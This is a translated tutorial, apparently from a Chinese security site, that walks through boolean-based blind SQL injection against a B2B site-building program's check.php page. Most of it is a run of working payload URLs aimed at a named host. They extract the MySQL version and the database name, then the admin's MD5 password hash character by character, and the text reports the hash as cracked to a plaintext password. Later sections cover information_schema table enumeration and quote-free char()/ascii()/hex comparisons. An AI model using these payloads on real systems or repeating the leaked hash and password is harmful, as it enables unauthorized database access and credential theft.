This injection point could be exploited with error-based injection to dump data directly; this article deliberately uses the more laborious blind injection to explain the technique.
Reading this article requires a little SQL background. Blind injection is simple to understand but tedious to carry out: nothing from the database is ever echoed, so every fact has to be inferred from a yes/no answer, one question per request.
Let's first look at the injection point, which is in a B2B site-building program:
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin
The page answers: the user name has been registered
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'
The page now echoes a MySQL error: select userid from demo_B2B_member where user = 'admin'' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin''' at line 1
The error message is clear: the single quote ended the string literal early and left a stray quote behind. Let's look at the code of the injection page (abridged):
$js_user = trim($_GET["js_user"]);   // taken straight from the query string, never escaped
if ($js_user) {
    $num = $db->num_rows("select userid from demo_B2B_member where user='$js_user'");
    if (!$num)
        echo "<div class=tips3></div>";                                  // no row matched: empty tip
    else
        echo "<div class=tips2>the user name has been registered</div>"; // at least one row matched
}
The js_user value from GET is concatenated into the query without any filtering, so MySQL executes whatever is injected. But the page never displays any data from the database; it only reveals whether the query returned rows: a non-zero num_rows prints "the user name has been registered", zero prints an empty tips3 div. That single bit of information is all a blind injection needs.
So let's start with boolean-based blind injection using and.
First, the version:
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(version(),1)=5%23
Let's see what SQL statement the original code now executes (%23 is a URL-encoded #, which comments out the rest of the line, including the original closing quote):
select userid from demo_B2B_member where user = 'admin' and left(version(),1)=5 #'
If the condition is true the query still returns admin's row, $num is 1 and "the user name has been registered" is displayed; if it is false no row matches and the page shows nothing. Here the message was displayed, so the major version is 5.
Next, the name of the current database, length first and then one character at a time:
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+length(database())=6%23
database() is 6 characters long
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(database(),1)='l'%23
confirmed: l
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(database(),2)='li'%23
confirmed: li
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(database(),3)='lic'%23
confirmed: lic
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(database(),4)='licl'%23
confirmed: licl
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(database(),5)='licln'%23
confirmed: licln
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(database(),6)='liclny'%23
confirmed: liclny
The length() function returns the length of its argument as a plain number, so instead of testing for equality you can narrow it down with > and < comparisons (a binary search) rather than guessing one value at a time.
Note how the second argument of left() grows by one with each request; for left() itself, refer to the MySQL manual.
Now a simpler one:
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+length(pass)=32%23
select userid from demo_B2B_member where user = 'admin' and length(pass)=32 #'
Here pass is a guessed column name, and everything that follows depends on that guess being right (a wrong column name produces a MySQL error instead of a row).
Since pass and the userid in the select belong to the same table, demo_B2B_member, no subquery is needed: the column can be referenced directly in the where clause.
Here is what we get:
Notice that the following requests have no %23 terminator. The payload opens a quote and never closes it; the closing quote that was already in the original query does that, so left(pass,1)='0 becomes left(pass,1)='0' and the statement stays valid. Opened before, closed after.
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,1)='0
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,2)='04
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,3)='048
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,4)='0484
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,5)='04843
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,6)='04843e
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,7)='04843e9
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,8)='04843e9f
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,9)='04843e9f9
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,10)='04843e9f91
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,11)='04843e9f91a
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,12)='04843e9f91ad
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,13)='04843e9f91adf
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,14)='04843e9f91adf2
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,15)='04843e9f91adf22
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,16)='04843e9f91adf228
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,17)='04843e9f91adf2287
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,18)='04843e9f91adf2287c
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,19)='04843e9f91adf2287c0
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,20)='04843e9f91adf2287c0a
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,21)='04843e9f91adf2287c0af
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,22)='04843e9f91adf2287c0af5
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,23)='04843e9f91adf2287c0af5f
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,24)='04843e9f91adf2287c0af5fe
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,25)='04843e9f91adf2287c0af5fe1
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,26)='04843e9f91adf2287c0af5fe16
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,27)='04843e9f91adf2287c0af5fe167
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,28)='04843e9f91adf2287c0af5fe1675
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,29)='04843e9f91adf2287c0af5fe16750
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,30)='04843e9f91adf2287c0af5fe16750a
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,31)='04843e9f91adf2287c0af5fe16750a3
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+left(pass,32)='04843e9f91adf2287c0af5fe16750a35
The length is 32 characters, i.e. an MD5 hash; cracking it gives lcl2wly.
With that, the method for guessing data character by character should be clear.
Finally, data outside demo_B2B_member. Table names can be guessed the same way, by asking about their length first:
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+length((select+table_name+from+information_schema.tables+limit+0,1))<23%23
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+length((select+table_name+from+information_schema.tables+limit+0,1))=14%23
The SQL actually executed:
select userid from demo_B2B_member where user = 'admin' and length((select table_name from information_schema.tables limit 0,1)) = 14 #'
Note the doubled parentheses: a subquery used as a value must be wrapped in its own parentheses inside length(), otherwise MySQL reports a syntax error. Once the length is known, the name is recovered with left() or substr() on the same subquery exactly as for pass. The first rows of information_schema.tables are information_schema's own tables (CHARACTER_SETS, 14 characters, is typically first), so to enumerate the application's tables add where table_schema=database() and step through them with limit.
If information_schema is unfamiliar, other MySQL injection articles explain this database: it exists from MySQL 5.0 onwards, which is why the version check came first, and it lists every database, table and column on the server.
For limit x,y see the MySQL manual: x is the offset and y the number of rows, so limit 0,1 is the first row and limit 1,1 the second.
The last thing to cover is the ascii(), hex() and char() functions.
Their purpose is to write a comparison without a quoted string literal, which is what PHP's magic_quotes_gpc escapes. For example:
http://www.bkjia.com/demo/B2B/member/check.php?js_user=admin'+and+substr(pass,1,1)=char(48)%23
select userid from demo_B2B_member where user = 'admin' and substr(pass,1,1) = char(48) #'
For substr() see the MySQL manual; substr(pass,1,1) is the first character of pass. The number in char() is the ASCII code of the character being tested: char(48) is '0', so this request tests the same thing as left(pass,1)='0' without needing a quote. The same comparison can be written the other way round as ascii(substr(pass,1,1))=48, or with a hex literal as substr(pass,1,1)=0x30. One caveat: at this injection point the opening admin' already needs an unescaped quote, so with magic_quotes_gpc on the break-out itself would be escaped; the quote-free comparison is what matters at injection points where the break-out needs no quote, such as numeric parameters.